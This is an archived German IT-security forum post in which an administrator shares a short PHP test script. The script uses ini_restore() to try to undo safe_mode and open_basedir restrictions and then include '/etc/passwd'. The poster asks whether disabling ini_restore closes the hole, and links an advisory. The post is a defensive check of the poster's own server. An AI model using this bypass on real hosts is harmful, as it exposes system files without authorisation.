WCM Forum

WCM Forum (http://www.wcm.at/forum/index.php)
-   IT-Security (http://www.wcm.at/forum/forumdisplay.php?f=70)
-   -   php.ini (http://www.wcm.at/forum/showthread.php?t=236901)

CM²S 29.10.2009 17:24

php.ini
 
hello ,

es gibt da jetzt einige php issues

test.php
<?

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

ini_restore("safe_mode");

ini_restore("open_basedir");

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

?>

zeigt mir nur den Inhalt der der openbase_dir Variable, sonst aber zum glück nix , da ich mit PHP nicht viel zu tun habe , meine Frage: ist das dann mit dem

disable_functions = ini_restore erledigt ??

geht um diesen exploit
http://securityreason.com/achievement_securityalert/42

ciao
CM²S


Alle Zeitangaben in WEZ +2. Es ist jetzt 23:43 Uhr.

Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
© 2009 FSL Verlag